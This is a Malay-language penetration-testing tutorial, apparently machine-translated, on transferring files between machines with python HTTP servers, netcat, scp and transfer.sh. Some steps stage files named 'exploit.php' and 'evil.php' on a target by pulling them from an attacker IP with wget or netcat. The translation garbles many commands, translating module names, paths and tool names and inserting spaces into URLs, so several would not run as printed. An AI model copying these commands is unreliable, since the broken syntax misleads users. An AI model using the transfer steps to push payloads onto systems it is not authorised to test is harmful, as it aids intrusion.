Phenquestions
Memindahkan eksploitasi, skrip python, dan memuat modul sering diperlukan semasa aktiviti ujian penembusan. Oleh kerana terminal adalah alat yang digunakan kebanyakannya, sangat penting untuk memahami asas-asas pemindahan fail.
Penguji pen harus dilengkapi dengan trik yang berbeza untuk memindahkan fail dari pelayan jauh dan juga dari satu direktori ke direktori lain. Dalam tutorial ini, kita akan membincangkan cara yang berbeza untuk memindahkan fail menggunakan baris perintah.
1. Pelayan Python
Python adalah pakej asas yang terpasang di hampir semua sistem berasaskan Debian. Untuk memindahkan fail dari satu mesin ke mesin lain, lakukan perkara berikut;
Python2:
Tukar ke direktori di mana fail anda yang ingin anda pindahkan ada. Mulakan pelayan python yang mudah. Masukkan arahan berikut;
$ python -m SimpleHTTPSPerver 8080
Sekarang pergi ke mesin di mana anda mahu memindahkan fail. Gunakan arahan berikut untuk memuat turun fail;
$ wget http: // 192.168.43.177: 8080 / fail
Ingatlah untuk mengganti IP, nombor Port & nama fail.
Python3:
Apa-apa yang ditulis dalam python2 hampir selalu rosak di python3. Oleh itu, kami juga melihat cara memindahkan fail menggunakan python3.
Dalam kes python3, masukkan arahan berikut untuk memulakan pelayan python sederhana.
$ python3 -m http.pelayan 8080
Untuk memuat turun fail pada sasaran, masukkan arahan berikut;
$ wget http: // 192.168.43.177: 8080 / eksploitasi.php
2. Netcat
Netcat adalah utiliti yang kuat untuk memindahkan fail dari mesin jauh ke mesin tempatan. Ia mungkin tidak selalu dipasang. Anda boleh memeriksa sama ada ia wujud atau tidak dengan memasukkan;
$ yang mana netcat
Sebagai alternatif, dengan memasukkan;$ yang nc
Buat pelayan netcat dengan arahan berikut;
$ nc -nlvp 8080 < evil.php
Sekarang pergi ke mesin sasaran dan masukkan yang berikut untuk memuat turun fail;
$ nc -nv 192.168.43.177 8080> kejahatan.php
Ganti nc dengan netcat dalam arahan di atas jika nc tidak berfungsi atau tidak dipasang dengan betul.
3. SCP
Secure Copy Protocol adalah alat yang ampuh untuk memindahkan fail. Ia sangat berguna terutamanya ketika anda ingin memindahkan direktori. Ia juga banyak digunakan untuk pemindahan fail melalui ssh.
Untuk memindahkan fail melalui ssh, masukkan arahan berikut pada mesin pengirim;
$ scp -i baru.ujian pem.py ubuntu @ 18.220.68.229: / rumah / ubuntu
Di mana -i mewakili kunci awam untuk ssh login, ujian.py adalah fail yang akan dipindahkan dan / home / ubuntu adalah direktori sasaran di mana kita ingin menyimpan fail tersebut.
Untuk memuat turun fail dari mesin jauh, masukkan arahan berikut;
$ scp root @ 192.168.43.177: / remote_directory / file / local / direktori
4. Pindahkan.sh
Anda boleh menggunakan alat pihak ketiga ini untuk memindahkan fail. Ia berguna apabila anda tidak mempunyai mesin dengan IP awam, dan anda masih perlu memindahkan failnya. Perintah berikut memuat naik fail ke pemindahan.pelayan sh;
$ curl --upload-file ./ fail.txt https: // pindah.sh / fail.txt
Untuk memuat turun fail, masukkan arahan berikut;
$ curl https: // pemindahan.sh // fail.fail txt -o.txt
Pindahkan.sh masih dalam pembangunan dan mungkin tidak berfungsi selalu.
Kesimpulannya
Alat baris perintah memberi kita kemampuan untuk memindahkan fail dengan pelbagai cara. Mereka mungkin kelihatan agak rumit tetapi memberi mereka kemampuan untuk mengurus fail dengan mudah, terutamanya apabila pilihan GUI tidak tersedia.
